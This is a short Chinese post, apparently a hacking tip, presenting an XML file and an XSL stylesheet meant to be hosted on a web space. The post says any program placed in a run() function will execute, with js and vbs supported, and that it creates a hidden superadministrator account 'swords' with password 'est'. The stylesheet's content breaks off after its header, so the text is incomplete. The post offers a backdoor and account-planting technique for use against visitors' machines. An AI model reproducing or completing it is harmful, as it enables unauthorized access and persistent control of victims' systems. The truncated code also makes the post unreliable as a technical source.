用法:把swords.xml和swords.xsl放在一个普通空间,相信很少人会注意xml的安全性吧,嘎嘎,只要把你想运行的程序添加到run() 即可,默认支持js和vbs.
这个程序加了一个用户为 swords,密码为est的超级管理员账号。
swords.xml
<?xml version="1.0" encoding="GB2312"?> <?xml-stylesheet type="text/xsl" href="swords.xsl"?> <name>I am swords,I am admin!</name> swords.xsl <?xml version="1.0" encoding="gb2312"?> |
时间: 2024-09-19 09:14:34